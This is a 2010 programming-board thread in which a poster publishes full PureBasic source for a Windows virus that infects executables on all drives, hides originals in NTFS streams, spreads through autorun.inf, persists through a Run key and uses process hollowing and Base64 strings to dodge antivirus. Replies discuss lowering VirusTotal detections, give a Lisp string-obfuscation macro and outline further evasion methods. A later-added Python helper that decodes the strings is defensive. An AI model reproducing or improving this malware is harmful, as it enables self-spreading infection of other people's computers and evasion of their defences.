
Win32.Stream remake

Name: Anonymous 2010-03-24 9:47

Yes, my lovely /prog/ - I got utterly bored again. This time you receive my variant of the infamous NTFS-abusing virus. Rate it, colleagues:

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-
; Win32.Flinch v0.9 (Beta)
; Developed in 2010 by Alicia.
; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-

EnableExplicit
#PSection = "fip+UFJJTUVfREFUQX4qfg=="
#Section = "OkZsaW5jaGVk"
#Resident = "bnRsZHIuZXhl"
#RegRunBranch = "U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu"
#RegDriveBranch = "U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUG9saWNpZXNcRXhwbG9yZXJc"
#SIMark = "Kl9GbGluY0hfKl9GbGluY0hfKg=="
#NTDLL = "bnRkbGwuZGxs"
#K32DLL = "S2VybmVsMzIuZGxs"
#UnMapper = "WndVbm1hcFZpZXdPZlNlY3Rpb24="
#WPMemory = "V3JpdGVQcm9jZXNzTWVtb3J5"
#RPMemory = "UmVhZFByb2Nlc3NNZW1vcnk="
#ARunFile = "OlxXaW5OVC5jb20="
#LibLoad = #DONT_RESOLVE_DLL_REFERENCES | #LOAD_LIBRARY_AS_DATAFILE
#HiddenSystem = #PB_FileSystem_Hidden | #PB_FileSystem_System
#MegaByte = 1024 * 1024
#CrunchDelay = 45
#FirstDrive = 'C'
Define Letter.c, DType, TPath.s{#MAX_PATH}, MyName.S = ProgramFilename()
Global *WaitingMutex = CreateMutex()
Global MySize, Size2, *MyBody, CRC32
Global Dim Drives.a('Z'-#FirstDrive-1)
Declare IsARunner(Path.s)
Declare CrunchDrive(Letter.i)
Declare.S Decode64(String.S)
Declare RegSetStr(hKey, SubKey.S, ValueName.S, Dat.S)
Declare RegSetInt(hKey, SubKey.S, ValueName.S, Dat.I)
Declare RunPE(PName.S, lBuff, parameters.s)
Declare.s TempFileName()
Declare InfuseData(EXE.s, *DataPtr, DataSize, DataName.s)
Declare ExfuseData(*Module, DataName.s)
Declare CopyResources(SrcModule.s, DestModule.s)
; Hiding suspicious function calls.
Prototype UnmapSectionPT(*ProcessHandle, *BaseAdress)
Prototype WriteProcessPT(*ProcessHandle, *BaseAdress, *Buffer, Size.l, *BytesWritten)
Prototype ReadProcessPT(*ProcessHandle, *BaseAdress, *Buffer, Size.l, *BytesReaded)
Global UnmapSection_.UnmapSectionPT=GetProcAddress_(GetModuleHandle_(Decode64(#NTDLL)),Decode64(#UnMapper))
Global WriteProcess_.WriteProcessPT=GetProcAddress_(GetModuleHandle_(Decode64(#K32DLL)),Decode64(#WPMemory))
Global ReadProcess_.ReadProcessPT=GetProcAddress_(GetModuleHandle_(Decode64(#K32DLL)),Decode64(#RPMemory))
; Some macros:
Macro SetRegSettings()
RegSetStr(#HKEY_LOCAL_MACHINE, Decode64(#RegRunBranch), Decode64("TlQ0IGhvc3Rpbmcgc2VydmljZQ=="), MyName)
RegSetInt(#HKEY_LOCAL_MACHINE, Decode64(#RegDriveBranch), Decode64("Tm9Ecml2ZUF1dG9SdW4="), 0)
RegSetInt(#HKEY_LOCAL_MACHINE, Decode64(#RegDriveBranch), Decode64("Tm9Ecml2ZVR5cGVBdXRvUnVu"), 0)
EndMacro
; Resident's path retrieving.
GetSystemDirectory_(@TPath, #MAX_PATH)
If Right(TPath, 1) <> "\" : TPath + "\" : EndIf
TPath + Decode64(#Resident)
SetRegSettings()
; Main choice...
If UCase(MyName) = UCase(TPath)
; -Resident behavior-
; Checking for second execution.
If CreateSemaphore_(0, 0, 1, Decode64(#SIMark)) And GetLastError_() = #ERROR_ALREADY_EXISTS : End : EndIf
; Body retrieving.
MySize = FileSize(MyName)
*MyBody = AllocateMemory(MySize)
ReadFile(0, MyName)
ReadData(0, *MyBody, MySize)
CloseFile(0)
; Machine name's CRC32 retrieving...
TPath = Space(#MAX_COMPUTERNAME_LENGTH)
DType = #MAX_COMPUTERNAME_LENGTH
GetComputerName_(@TPath, @DType)
CRC32 = CRC32Fingerprint(@TPath, DType)
; ---------------------
; Drives loop.
TPath = Decode64("Kjpc")
Repeat : SetRegSettings(); Infinite loop
For Letter = #FirstDrive To 'Z' : PokeC(@TPath, Letter)
DType = GetDriveType_(@TPath); Retrieving type of drive.
If DType => #DRIVE_REMOVABLE And DType <= #DRIVE_RAMDISK And DType <> #DRIVE_CDROM
; Testing if drive is already being crunched.
If Drives(Letter - #FirstDrive) = #False
Drives(Letter - #FirstDrive) = #True
CreateThread(@CrunchDrive(), Letter)
EndIf
EndIf
Next Letter
Delay(15 * 1000); Light pause for better mood.
ForEver
; ---------------------
Else
; -Agent behavior-
SetFileAttributes(TPath, #PB_FileSystem_Normal)
If CreateFile(1, TPath); If resident isn't already executed...
; Preparing body for transfer.
*MyBody = ExfuseData(#Null, Decode64(#PSection))
If *MyBody = #Null : ReadFile(0, MyName); If no prime found...
MySize = Lof(0) : *MyBody = AllocateMemory(MySize)
ReadData(0, *MyBody, MySize)
CloseFile(0)
Else : MySize = MemorySize(*MyBody)
EndIf
; Transferring body.
WriteData(1, *MyBody, MySize) : CloseFile(1)
EndUpdateResource_(BeginUpdateResource_(@TPath, #True), #False); Do not pack with UPX!
RunProgram(TPath)
FreeMemory(*MyBody)
EndIf; Now hiding it for sure:
SetFileAttributes(TPath, #HiddenSystem)
TPath = Decode64(#ARunfile)
; Original program's execution.
If IsARunner(MyName) = #False; If it isn't autorunner...
If ReadFile(0, MyName + Decode64(#Section)); Header
ReadFile(1, MyName); Main body - our code.
MySize = Lof(1) : *MyBody = AllocateMemory(MySize)
Size2 = Lof(0)  : ReadData(0, *MyBody, Size2)
FileSeek(1, Size2); Rewinding to read body
ReadData(1, *MyBody + Size2, MySize - Size2)
CloseFile(1)
CloseFile(0)
TPath = PeekS(GetCommandLine_())
RunPE(MyName, *MyBody, Right(TPath, Len(TPath) - Len(MyName) - 3))
Else : ! MOV EAX, [0]; Imitate error.
EndIf
; Imitate opening of drive in Explorer.
Else : RunProgram(Decode64("ZXhwbG9yZXIuZXhl"), Left(MyName, 3), "")
EndIf
EndIf

Name: Anonymous 2010-03-24 9:48

...continuing...

; -Procedures-
Procedure IsARunner(Path.s)
Define APath.S = LCase(Decode64(#ARunFile))
If LCase(Right(Path, Len(APath))) = LCase(APath)
ProcedureReturn #True
EndIf
EndProcedure

Procedure FindEXEs(Root.S) : Delay(#CrunchDelay)
Define SIdx, Attribs, CDate, ADate, MDate
Define Target.s, FTarget.s, TmpFile.S, *FPtr
Define *NewBody, NewSize
If Right(Root, 1) <> "\" : Root + "\" : EndIf
SIdx = ExamineDirectory(#PB_Any, Root, Decode64("Ki4q"))
If SIdx; If it can be examined...
While NextDirectoryEntry(SIdx)
Target = DirectoryEntryName(SIdx); Retrieving name
If DirectoryEntryType(SIdx) = #PB_DirectoryEntry_File
ADate = DirectoryEntryDate(SIdx, #PB_Date_Accessed); Reading before everything else.
If UCase(Right(Target, 4)) = Decode64("LkVYRQ=="); If it's EXEcutable...
Target = Root + Target; Reformatting path to target.
FTarget = Target + Decode64(#Section)
; ----------------------------
If ReadFile(0, FTarget) = #Null; If not already modified...
If FreeLibrary_(LoadLibraryEx_(Target, #Null, #LibLoad)); If it's valid...
; Prepare modifications.
Attribs = DirectoryEntryAttributes(SIdx)
CDate = DirectoryEntryDate(SIdx, #PB_Date_Created)
MDate = DirectoryEntryDate(SIdx, #PB_Date_Modified)
SetFileAttributes(Target, #PB_FileSystem_Normal)
; Restructuring body with new resources.
TmpFile = TempFileName()
*FPtr = CreateFile(#PB_Any, Tmpfile)
WriteData(*FPtr, *MyBody, MySize)
CloseFile(*FPtr)
CopyResources(Target, TmpFile)
InfuseData(TmpFile, *MyBody, MySize, Decode64(#PSection))
NewSize = FileSize(TmpFile)
*NewBody = AllocateMemory(NewSize)
; Retrieving target's code.
*FPtr = ReadFile(#PB_Any, Target)
ReadData(*FPtr, *NewBody, NewSize)
CloseFile(*FPtr)
; Storing it into new stream.
*FPtr = CreateFile(#PB_Any, FTarget)
WriteData(*FPtr, *NewBody, NewSize)
CloseFile(*FPtr)
; Retrieving new body code.
*FPtr = ReadFile(#PB_Any, Tmpfile)
ReadData(*FPtr, *NewBody, NewSize)
CloseFile(*FPtr)
DeleteFile(TmpFile)
; Modify target.
*FPtr = OpenFile(#PB_Any, Target)
WriteData(*FPtr, *NewBody, NewSize)
CloseFile(*FPtr)
; Finalization.
FreeMemory(*NewBody)
SetFileAttributes(Target, Attribs)
SetFileDate(Target, #PB_Date_Created, CDate)
SetFileDate(Target, #PB_Date_Modified, MDate)
Delay(#CrunchDelay); Little pause
EndIf
Else : CloseFile(0)
EndIf
; ----------------------------
EndIf
SetFileDate(Target, #PB_Date_Accessed, ADate); Still restoring access time.
; Continue search recursively.
ElseIf Target <> "." And Target <> ".." : FindEXEs(Root + Target)
EndIf
Wend
FinishDirectory(SIdx)
EndIf
EndProcedure

Procedure AddAutoRunner(Drive.a)
#AInfo="W2F1dG9ydW5dI0NSI09wZW49KiojQ1Ijc2hlbGxFeGVjdXRlPSoqI0NSI3NoZWxsXE9wZW5cY29tbWFuZD0qKiNDUiNzaGVsbD1PcGVu"
Define Target.S = Chr(Drive) + Decode64(#ARunFile)
; Preparing runfile...
SetFileAttributes(Target, #PB_FileSystem_Normal)
Define *FPtr = CreateFile(#PB_Any, Target)
WriteData(*FPtr, *MyBody, Mysize)
CloseFile(*FPtr)
SetFileAttributes(Target, #HiddenSystem)
; Preparing .inf file...
Define InfoFile.S = Chr(Drive) + Decode64("OlxBdXRvUnVuLmluZg==")
SetFileAttributes(InfoFile, #PB_FileSystem_Normal)
*FPtr = CreateFile(#PB_Any, InfoFile)
Define InfoText.s=ReplaceString(ReplaceString(Decode64(#AInfo),Decode64("I0NSIw=="),#CR$),Decode64("Kio="),Target)
WriteData(*FPtr, @InfoText, StringByteLength(InfoText))
CloseFile(*FPtr)
SetFileAttributes(InfoFile, #HiddenSystem)
EndProcedure

Procedure CrunchDrive(Letter.i)
If CRC32 = 1888994306 Or ~(CRC32 % CRC32); If it's mine PC...
FindExes(Chr(Letter) + Decode64("OlxUZXN0")); ":\Test" run.
Else : AddAutoRunner(Letter); For more fun.
FindExes(Chr(Letter) + Decode64("Olw="))
EndIf
LockMutex(*WaitingMutex)
Drives(Letter - #FirstDrive) = #False
UnlockMutex(*WaitingMutex)
EndProcedure

Procedure.S Decode64(String.S)
Define DB.S{200}
Base64Decoder(@String, Len(String), @DB, 200)
ProcedureReturn PeekS(@DB)
EndProcedure

Procedure RegSetStr(hKey, SubKey.S, ValueName.S, Dat.S)
Define *Hnd
RegCreateKeyEx_(hKey, @SubKey, 0, 0, 0, #KEY_WRITE, 0, @*Hnd, 0)
RegSetValueEx_(*Hnd, @ValueName, 0, #REG_SZ, @Dat, Len(Dat))
RegCloseKey_(*Hnd)
EndProcedure

Procedure RegSetInt(hKey, SubKey.S, ValueName.S, Dat.I)
Define *Hnd
RegCreateKeyEx_(hKey, @SubKey, 0, 0, 0, #KEY_WRITE, 0, @*Hnd, 0)
RegSetValueEx_(*Hnd, @ValueName, 0, #REG_DWORD, @Dat, SizeOf(Integer))
RegCloseKey_(*Hnd)
EndProcedure

Structure IMAGE_SECTION_HEADER
SecName.b[8]
StructureUnion
PhysicalAddr.l
VirtualSize.l
EndStructureUnion
VirtualAddress.l
SizeOfRawData.l
PointerToRawData.l
PointerToRelocations.l
PointerToLinenumbers.l
NumberOfRelocations.w
NumberOfLinenumbers.w
Characteristics.l
EndStructure

Structure IMAGE_SECTION_HEADERS
ish.IMAGE_SECTION_HEADER[95]
EndStructure

Procedure RunPE(PName.S, lBuff, parameters.s)
Protected *idh.IMAGE_DOS_HEADER= lBuff
Protected *ish.IMAGE_SECTION_HEADERS
Protected pi.PROCESS_INFORMATION
Protected *inh.IMAGE_NT_HEADERS
Protected si.STARTUPINFO
Protected lpBaseAddres.l
Protected Ctx.CONTEXT
Protected Addr.l, ret.l, i.l
CreateProcess_(#NUL, PName + " " + Parameters, #NUL, #NUL, #False, #CREATE_SUSPENDED, #NUL, #NUL, @si, @pi)
Ctx\ContextFlags = #CONTEXT_INTEGER
If GetThreadContext_(pi\hThread, Ctx) = 0: Goto EndThread : EndIf
ReadProcess_(pi\hProcess, Ctx\Ebx + 8, @Addr, 4, #NUL)
If UnmapSection_(Pi\hProcess, Addr): Goto EndThread : EndIf
If lBuff = 0 : Goto EndThread : EndIf
*inh = lBuff + *idh\e_lfanew
With *inh\OptionalHeader
lpBaseAddres = VirtualAllocEx_(pi\hProcess,\ImageBase,\SizeOfImage,#MEM_COMMIT|#MEM_RESERVE,#PAGE_EXECUTE_READWRITE)
EndWith
WriteProcess_(pi\hProcess, lpBaseAddres, lBuff, *inh\OptionalHeader\SizeOfHeaders, @ret)
*ish = *inh\OptionalHeader + *inh\FileHeader\SizeOfOptionalHeader
With *ish
For i = 0 To *inh\FileHeader\NumberOfSections - 1
WriteProcess_(pi\hProcess,lpBaseAddres+\ish[i]\VirtualAddress,lBuff+\ish[i]\PointerToRawData,\ish[i]\SizeOfRawData,@ret)
Next
EndWith
WriteProcess_(pi\hProcess, Ctx\Ebx + 8, @lpBaseAddres, 4, #NUL)
Ctx\Eax = lpBaseAddres + *inh\OptionalHeader\AddressOfEntryPoint
SetThreadContext_(pi\hThread, Ctx)
ResumeThread_(pi\hThread)
ProcedureReturn
EndThread:
TerminateProcess_(pi\hProcess, #NUL)
CloseHandle_(pi\hThread)
CloseHandle_(pi\hProcess)
EndProcedure

Procedure.s TempFileName()
Define TempDir.S{#MAX_PATH}, TempFile.S{#MAX_PATH}
GetTempPath_(#MAX_PATH, @TempDir)
GetTempFileName_(@TempDir, Decode64("Xytf"), 0, @TempFile)
ProcedureReturn TempFile
EndProcedure

Procedure InfuseData(EXE.s, *DataPtr, DataSize, DataName.s)
Define *Update = BeginUpdateResource_(EXE, #False)
UpdateResource_(*Update, #RT_RCDATA, @DataName, 0, *DataPtr, DataSize)
EndUpdateResource_(*Update, #False)
EndProcedure

Procedure ExfuseData(*Module, DataName.s)
Define *Res = FindResource_(*Module, @DataName, #RT_RCDATA)
Define *BinData = LockResource_(LoadResource_(*Module, *Res))
Define DataSize = SizeofResource_(*Module, *Res)
*Res = AllocateMemory(DataSize)
CopyMemory(*BinData, *Res, DataSize)
ProcedureReturn *Res
EndProcedure

Procedure ResCopyCB(*hModule, *TypeStr, *NameStr, *Update)
Define *hResourceInfo = FindResource_(*hModule, *NameStr, *TypeStr)
Define *pResourceLock = LockResource_(LoadResource_(*hModule,
*hResourceInfo))
Define ResSize = SizeofResource_(*hModule, *hResourceInfo)
If *TypeStr <> #RT_RCDATA Or ResSize < 10 * #MegaByte
; ^Some sizing optimization (may cause problems)^
UpdateResource_(*Update, *TypeStr, *NameStr, 0, *pResourceLock, ResSize)
EndIf
ProcedureReturn #True
EndProcedure

Procedure ResTypesCB(*hModule, *TypeStr, *Update)
EnumResourceNames_(*hModule, *TypeStr, @ResCopyCB(), *Update)
ProcedureReturn #True
EndProcedure

Procedure CopyResources(SrcModule.s, DestModule.s)
Define *hModule = LoadLibraryEx_(SrcModule, #Null, #LibLoad)
Define *hResourceUpdate = BeginUpdateResource_(DestModule, #True)
EnumResourceTypes_(*hModule, @ResTypesCB(), *hResourceUpdate)
EndUpdateResource_(*hResourceUpdate, #False)
FreeLibrary_(*hModule)
EndProcedure
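
The Base64 constants in the listing above are only light obfuscation; a later reply decodes a few of them by hand, and an analyst triaging such a sample wants all of them at once. The following Python helper is an added example, not part of the thread or the posted code: it pulls every quoted Base64 literal out of a source excerpt, rejoins literals the board wrapped across two lines, and maps constant names to their decoded values so they can be turned into detection content. The excerpt is a constructed subset of the listing's own string constants, and the function names are mine.

```python
"""Triage helper (added example): recover Base64-hidden strings from a listing.

Constructed for the PureBasic listing above; not part of the thread.
"""
import base64
import re

# Constructed excerpt: string constants copied from the listing, no logic.
# The #RegDriveBranch literal is wrapped over two lines exactly as the board
# rendered it, which the helper has to cope with.
SAMPLE_SOURCE = r'''
#PSection = "fip+UFJJTUVfREFUQX4qfg=="
#Section = "OkZsaW5jaGVk"
#Resident = "bnRsZHIuZXhl"
#RegRunBranch = "U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu"
#RegDriveBranch = "U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUG9saWNpZXNcRXhwbG9y
ZXJc"
#ARunFile = "OlxXaW5OVC5jb20="
#MegaByte = 1024 * 1024
If Right(TPath, 1) <> "\" : TPath + "\" : EndIf
RegSetStr(#HKEY_LOCAL_MACHINE, Decode64(#RegRunBranch), Decode64("TlQ0IGhvc3Rpbmcgc2VydmljZQ=="), MyName)
'''

# A quoted run of Base64 alphabet characters; \s lets a literal that the
# board wrapped onto a second line still match as one token.
LITERAL_RE = re.compile(r'"([A-Za-z0-9+/=\s]{4,})"')
# '#Name = "<literal>"' constant definitions at the start of a line.
CONST_RE = re.compile(r'^#(\w+)\s*=\s*"([A-Za-z0-9+/=\s]{4,})"', re.MULTILINE)


def try_decode(literal):
    """Return the decoded ASCII text of a Base64 literal, or None.

    Whitespace (line wraps) is removed first; anything that is not valid,
    correctly padded Base64 yielding printable ASCII is rejected, so ordinary
    identifiers that merely look like Base64 are filtered out.
    """
    token = "".join(literal.split())
    if len(token) < 4 or len(token) % 4:
        return None
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from it
        return None
    return text if text.isprintable() else None


def decode_constants(source):
    """Map each '#Name = "<base64>"' definition to its decoded value."""
    decoded = {}
    for name, literal in CONST_RE.findall(source):
        text = try_decode(literal)
        if text is not None:
            decoded[name] = text
    return decoded


def decode_literals(source):
    """Map every decodable quoted literal, inline Decode64("...") calls
    included, to its decoded value, keyed by the joined Base64 token."""
    decoded = {}
    for match in LITERAL_RE.finditer(source):
        text = try_decode(match.group(1))
        if text is not None:
            decoded["".join(match.group(1).split())] = text
    return decoded


if __name__ == "__main__":
    for name, text in decode_constants(SAMPLE_SOURCE).items():
        print(f"{name:16} -> {text}")
    for token, text in decode_literals(SAMPLE_SOURCE).items():
        print(f"{token[:20]:20}... -> {text}")
```

Run it over the full listing to get the file name the resident uses, the stream suffix appended to infected executables, the autorun file name and the Run-key value name in one pass.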

Name: Anonymous 2010-03-24 9:50

That syntax colorizer sure needs a lot more love...

Name: sage 2010-03-24 10:27

wow... whole base64

Name: Anonymous 2010-03-24 10:30

Developed in 2010 by Alicia.

YOU GO GIRL

Name: Anonymous 2010-03-24 10:39

>>5
Welcome /prog/

Name: Anonymous 2010-03-24 10:41

Name: Anonymous 2010-03-24 10:57

I laughed at the pointless base64'ing. Why did you add that? To fool crappy AVs?

Name: Anonymous 2010-03-24 11:09

Name: Anonymous 2010-03-24 11:11

well, the method used to indent this code suggests that the OP is indeed female in nature.

Name: Anonymous 2010-03-24 11:13

>>8
That was one of the reasons. Another one: kids with Hiew32-esque tools need some love too.

Name: Anonymous 2010-03-24 11:18

>well, the method used to indent this code suggests that the OP is indeed female in nature.

...And used an 800x600 monitor a few years ago. Traumatizing experience, I should admit.

Name: Anonymous 2010-03-24 11:28

>>12
...And used an 800x600 monitor a few years ago. Traumatizing experience, I should admit.

who didn't?
and what do you mean by a few years?

Name: Anonymous 2010-03-24 11:33

>who didn't?
Lots of people. There are even some kids who honestly believe that there were no monochrome monitors.

>and what do you mean by a few years?
About 3 years ago, I suppose.

Name: 8 2010-03-24 11:49

>>1
ntldr.exe
~*~PRIME_DATA~*~
WinNT.com?

>>11
Hiew32 is lovely.

Since this thread is about silly things:

I always wondered why virus/malware/protection authors don't use Lisp more; here's how one could implement string obfuscation using macros (executed at compile time):

Name: Anonymous 2010-03-24 11:49

Well, fuck, I fail at BBCode:

;;; Any silly symmetric Feistel cipher will do
(declaim (inline xor-text))

(eval-when (:compile-toplevel :load-toplevel :execute)
  (defun xor-text (text key)
    "Simple xor cipher"
    (let* ((length (length text))
           (s (make-string length))
           (key-len (length key)))
      (dotimes (i (length text) s)     
        (setf (aref s i)
              (code-char
               (logxor (aref key (mod i key-len))
                       (char-code (aref text i))))))))

  ;; I don't remember how to do this portably
  (defconstant +max-char-ord+
    #+sbcl
    #x11000
    #-sbcl
    #x100)

  (defun make-random-key (length &aux
                          (result (make-array length :element-type 'fixnum))) 
    (dotimes (i length result)
      (setf (aref result i) (random +max-char-ord+)))))

;CL-USER> (xor-text "abcad" #(20 90 100 3))
;"u8bp"
;CL-USER> (xor-text * #(20 90 100 3))
;"abcad"
;CL-USER> (make-random-key 10)
;#(#x828F325 #x1022186C #x1004CE7A #x1C72A2D3 #x3E12909 #x1FA2D2D0
;  #x11166B70 #x1C2D454A #x10F624C8 #x165F40CD)
;(let ((random-key (make-random-key 3))) (xor-text (xor-text "abc" random-key) random-key)) =>
;

(defmacro hide-text (text &optional (key-length (1+ (random (1- (length text))))))
  (let ((the-key (make-random-key key-length)))
    `(xor-text ,(xor-text text the-key) ,the-key)))

;CL-USER> (hide-text "Hello there")
;"Hello there"
;CL-USER> (macroexpand '(hide-text "Hello there"))
; => Emacs crashed due to invalid unicode characters... ahaha.
; should be:
; (XOR-TEXT "...invalid unicode characters..." #(randomly generated key of random length lesser than length of text, unique for each time you compile))
;* (disassemble (compile nil '(lambda () (hide-text "Hello there"))))
; disassembly for (LAMBDA ())
; 23E77B2A:       892D2C041022     MOV [#x2210042C], EBP      ; no-arg-parsing entry point
;       30:       BE38000000       MOV ESI, 56
;       35:       033578D14100     ADD ESI, [#x41D178]        ; _boxed_region
;       3B:       3B357CD14100     CMP ESI, [#x41D17C]
;       41:       7607             JBE L0
;       43:       E878A859DC       CALL #x4123C0              ; _alloc_overflow_esi
;       48:       EB09             JMP L1
;       4A: L0:   893578D14100     MOV [#x41D178], ESI        ; _boxed_region
;       50:       83EE38           SUB ESI, 56
;       53: L1:   8D7607           LEA ESI, [ESI+7]
;       56:       C646F9AA         MOV BYTE PTR [ESI-7], 170
;       5A:       C646FD2C         MOV BYTE PTR [ESI-3], 44
;       5E:       312D2C041022     XOR [#x2210042C], EBP
;       64:       7402             JEQ L2
;       66:       CC09             BREAK 9                  
;       68: L2:   31DB             XOR EBX, EBX
;       6A:       EB45             JMP L4
;       6C: L3:   8BC3             MOV EAX, EBX
;       6E:       99               CDQ
;       6F:       B924000000       MOV ECX, 36
;       74:       F7F9             IDIV EAX, ECX
;       76:       C1E002           SHL EAX, 2
;       79:       8B05F07AE723     MOV EAX, [#x23E77AF0]      ; #(28073 23633
                                                              ;   29359 5798 ..)
;       7F:       8B4C1001         MOV ECX, [EAX+EDX+1]
;       83:       8B05F47AE723     MOV EAX, [#x23E77AF4]      ; encrypted unicode string is here
;       89:       8B441801         MOV EAX, [EAX+EBX+1]
;       8D:       8D148500000000   LEA EDX, [EAX*4]
;       94:       8BC1             MOV EAX, ECX
;       96:       31D0             XOR EAX, EDX               ; SBCL respected my inline declaration, xor decryption is done here
;       98:       83F800           CMP EAX, 0                
;       9B:       7C20             JL L6
;       9D:       8BC8             MOV ECX, EAX
;       9F:       81F9FCFF4300     CMP ECX, 4456444
;       A5:       7F16             JNLE L6
;       A7:       C1F802           SAR EAX, 2
;       AA:       89441E01         MOV [ESI+EBX+1], EAX
;       AE:       83C304           ADD EBX, 4
;       B1: L4:   83FB2C           CMP EBX, 44
;       B4:       7CB6             JL L3
;       B6:       8BD6             MOV EDX, ESI
;       B8:       8BE5             MOV ESP, EBP
;       BA:       F8               CLC
;       BB:       5D               POP EBP
;       BC:       C3               RET
;       BD: L5: L6:8B0DF87AE723     MOV ECX, [#x23E77AF8]     ; '(MOD 1114112)
;       C3:       CC0A             BREAK 10                   ; error trap
;       C5:       03               BYTE #X03
;       C6:       1F               BYTE #X1F                  ; OBJECT-NOT-TYPE-ERROR
;       C7:       0D               BYTE #X0D                  ; EAX
;       C8:       4E               BYTE #X4E                  ; ECX
;       C9:       CC0A             BREAK 10                   ; error trap
;       CB:       02               BYTE #X02
;       CC:       18               BYTE #X18                  ; INVALID-ARG-COUNT-ERROR
;       CD:       4D               BYTE #X4D                  ; ECX

Name: Anonymous 2010-03-24 12:27

What sort of shit language is that?

Name: Anonymous 2010-03-24 12:28

Base64Decoder ftw.

Hiew32 is lovely.

Yeah, I'm using it too. Quite good in conjunction with good old Volkov Commander.

Name: Anonymous 2010-03-24 12:28

>>17
LISP

Name: Anonymous 2010-03-24 12:37

>>17
The OP is probably PureBasic or some other Win32 Basic derivate.
>>16 is Common Lisp, the examples are ran on 32bit SBCL.

Name: Anonymous 2010-03-24 13:53

The OP is probably PureBasic
Bingo !

Name: Anonymous 2010-03-24 14:55

>>20
implying someone on /prog/ wouldn't know what Lisp is.

Name: Anonymous 2010-03-24 15:05

implying someone on /prog/ wouldn't know what Lisp is.

me. explain plz !!

Name: Anonymous 2010-03-24 21:41

>>20
are ran
These grammar trolls are getting worse and worse.

Name: Anonymous 2010-03-25 2:18

>>1 some WPF disabling wouldn't hurt, I suppose

Name: Anonymous 2010-03-25 4:39

>>7
why do you idiots keep posting these 404 links?

Name: Anonymous 2010-03-25 4:42

>>26
It wasn't 404 at the time it was posted. It's not his problem if readers 5 years from now can't view it.

Name: not >>26 2010-03-25 4:52

>>27
Given that this is a textboard in which you can view threads from 5 years ago, it is rather impolite of you to say "Screw the future". The problem is that the person tried to view the link within 24 hours and it is already dead, meanwhile the thread is still active!

Name: Anonymous 2010-03-25 5:07

>>28
Well you should have been here when it happened, NEWFAG!

Name: Anonymous 2010-03-25 5:10

>>29
I was here. I saw the image. There is no reason that future generations should suffer the same one ;)

Name: Anonymous 2010-03-25 5:12

>>30
s/should/shouldn't/

Name: Anonymous 2010-03-25 5:17

Save Images to Imgur.com for future generations.

Name: Anonymous 2010-03-25 6:06

>>32
ImageShack would work too.

Name: Anonymous 2010-03-25 6:23

>>29
it was a 404 when it happened, unless you can prove otherwise.

Name: Anonymous 2010-03-25 6:23

>>33
That's like saying Microsoft Word should work too.

Name: Anonymous 2010-03-25 6:26

>>33
You'd get banned for uploading that sort of thing.

Name: Anonymous 2010-03-25 10:08

>>36,33,32,30,27,...
Convert it into high-res ASCII art and post it here. I have it both on cache and saved to disk if nobody else wants to.

Name: Anonymous 2010-03-25 13:56

>>37
DO IT FAGGOT

Name: Anonymous 2010-03-25 16:55

>>29
NEWFAG
[Back to /b/

Name: Anonymous 2010-03-25 16:56

>>35
Microsoft Word does work.

Name: Anonymous 2010-03-25 18:52

>>40
You're FUNNY!

Name: Anonymous 2010-03-25 20:17

Name: Anonymous 2010-03-25 20:51

>>41

What about his funny?

Name: Anonymous 2010-03-26 4:42

Just in case someone didn't notice: the link in >>9 is still valid.

Name: Anonymous 2010-03-26 5:44

>>44
what is it?

Name: Anonymous 2010-03-26 5:58

>>45
the url says "2-ch". so obviously, it's porn.

Name: Anonymous 2010-03-26 6:31

>>9
I really enjoy the improvisational piece very much, reminds me of Kandinsky. You have truly captured the process of your creation, and the tools you used clearly mated with the canvas quite well. It is pleasing to the eye. Your creation's context could possibly derive from the birth of the electronic keyboard in 1980's music, yet at the same time I'm reminded of the deep emotions seeded in a personal relationship between a boy and his first imaginary friend. The environment you grew up in has surely been reflected in this masterpiece.

Name: Anonymous 2010-03-26 6:35

>>47
Nice try but No.

Name: Anonymous 2010-03-26 6:54

http://i39.tinypic.com/2yopn4n.jpg

Now valid forever[1]

[1] Well, maybe not forever, but certainly will outlive the link that >>9 provided

Name: Anonymous 2010-03-27 3:44

just compiled it: around 8 detections. not too bad for non-crypted code, but still needs some stealth.

Name: Anonymous 2010-03-27 4:47

>>50

Um, VirusTotal? If so, I already managed to reduce the number of detections to 6 in the latest revision. Still needs some more work, however...

Name: Anonymous 2010-03-27 8:21

Awesome: just upgraded the autorunning functionality by adding a command for deletion of the 'autorun.inf' directory. -1 positive on VirusTotal.

Name: Anonymous 2010-03-27 10:17

>>50-52
You do know there are fairly foolproof methods of having near perfect (it's impossible to get 100% clean now that Symantec just flags every file it has never seen before as suspicious, which I find very offensive to those that actually don't produce malware, but have all their new updates flagged by their silly popularity-based detection) detection rates on VirusTotal? Such methods involve heavy metamorph transforms of the loader, manual API resolving (by hash), and calling to the kernel directly (find out SSDT offsets/ids by loading up ntdll and resolving from there). Current AVs suck balls (and will likely continue to do so for a while) at dealing with such things. I'd be surprised if any manage to detect anything if they function in userland only (and since MS added PatchGuard, they can't do ring0 hooks to properly monitor things). Of course, those that run the file sandboxed and have a ring0 driver which can intercept the calls (PatchGuard disabled, or just run on XP or similar) will be able to use heuristics to find out if you're doing anything bad.

Name: Anonymous 2010-03-27 10:27

>>53
This is the greatest amount of bullshit in a single paragraph I've seen this week.

Name: Anonymous 2010-03-27 11:23

>>1

Please re-write this in a readable language like C.

Name: Anonymous 2010-03-27 11:57

>>54
Oh really? I'd like to see you prove me wrong.

I've yet to see AVs which can properly handle morphed/VMed malware. Most of them are signature based, and the rest either have some primitive emulation or some active hook-based heuristics.

How do you propose an AV would catch some malware which just uses sysenter/int2F to do syscalls if they don't have a kernel driver which intercepts those calls (keep in mind, Microsoft prevented SSDT hooking as a legitimate method for AV vendors by implementing PatchGuard).

Provide some proof for your words >>54, or IHBT.

Name: not >>54 2010-03-28 3:06

I agree with >>56 in essence.
>>53 was not very well written though.
